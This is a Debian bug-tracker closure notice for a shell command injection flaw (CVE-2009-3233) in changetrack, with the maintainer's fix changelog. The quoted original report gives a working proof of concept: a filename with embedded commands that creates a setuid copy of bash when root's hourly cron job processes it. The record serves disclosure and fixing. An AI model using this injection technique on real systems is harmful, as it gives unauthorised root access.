Bug#546791: marked as done (CVE-2009-3233: shell command injection via filename)

Thu, 17 Sep 2009 15:47:30 -0700 

Your message dated Thu, 17 Sep 2009 22:18:08 +0000
with message-id <[email protected]>
and subject line Bug#546791: fixed in changetrack 4.5-2
has caused the Debian Bug report #546791,
regarding CVE-2009-3233: shell command injection via filename
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall's Practical Extraction 

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


Its is posible, to run commands as root, if you have permision to create
files in directory chcked via changetrack, example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack shudnot use shell commands, or escape sh special
haracters like spaces enters ; etc...

-- 
  Regards
      Marek Grzybowski

--- End Message ---
--- Begin Message --- 
Source: changetrack
Source-Version: 4.5-2

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.5-2.diff.gz
  to pool/main/c/changetrack/changetrack_4.5-2.diff.gz
changetrack_4.5-2.dsc
  to pool/main/c/changetrack/changetrack_4.5-2.dsc
changetrack_4.5-2_all.deb
  to pool/main/c/changetrack/changetrack_4.5-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <[email protected]> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.5-2
Distribution: unstable
Urgency: low
Maintainer: Jens Peter Secher <[email protected]>
Changed-By: Jens Peter Secher <[email protected]>
Description: 
 changetrack - monitor changes to (configuration) files
Closes: 546791
Changes: 
 changetrack (4.5-2) unstable; urgency=low
 .
   * [reject-weird-filenames.diff] Fix possible local exploit by rejecting
     filenames with unsafe characters (cf. CVE-2009-3233).  Thanks to Marek
     Grzybowski and Andrzej Lemieszek.
     (Closes: #546791)
Checksums-Sha1: 
 3f8c484862fe780799cb222e9e167060f816380d 1203 changetrack_4.5-2.dsc
 dd2276879e4e4978bcd8719305257883110c283b 13966 changetrack_4.5-2.diff.gz
 bd6371b033eb49bb87c3671c6c8a62df1331f0b0 22160 changetrack_4.5-2_all.deb
Checksums-Sha256: 
 66ae538c9a129c6cde8d5030a367990d885cc2f8e340641fb2fabd5d649264c3 1203 
changetrack_4.5-2.dsc
 8c43f60545ad78d1c42605f7e507121c4e2d607d0bf280cbd56c518a0ceb1343 13966 
changetrack_4.5-2.diff.gz
 e25d8c2c03e2a821025b9afe3da60dcd4e13d8827420f315ab898c891c7ee0d4 22160 
changetrack_4.5-2_all.deb
Files: 
 6453dd7fb96ed8f2cc5cf00b6a4e305a 1203 utils optional changetrack_4.5-2.dsc
 28ed49102de02d769d67315616be21d0 13966 utils optional changetrack_4.5-2.diff.gz
 489f18c7e76e6f00db07691d0ad178ef 22160 utils optional changetrack_4.5-2_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)

iJwEAQECAAYFAkqynasACgkQiFVdEFPVQL/C1AQAw56DBodzOh/hxvp9I3bBMi39
tYXGDnAyDF/6XkAf3zOvm5pAbuVTmazucEeiTvU+z6nNywKY71fnzEGQOaEqm5Vd
draYAes9ibVdpC+FB5Ps870gBMrJxO10tp+4oYp4s0w7ocwX8kECRAlmf4GTb1pX
rQqRLf/e6zeebf0m4hc=
=gUE0
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to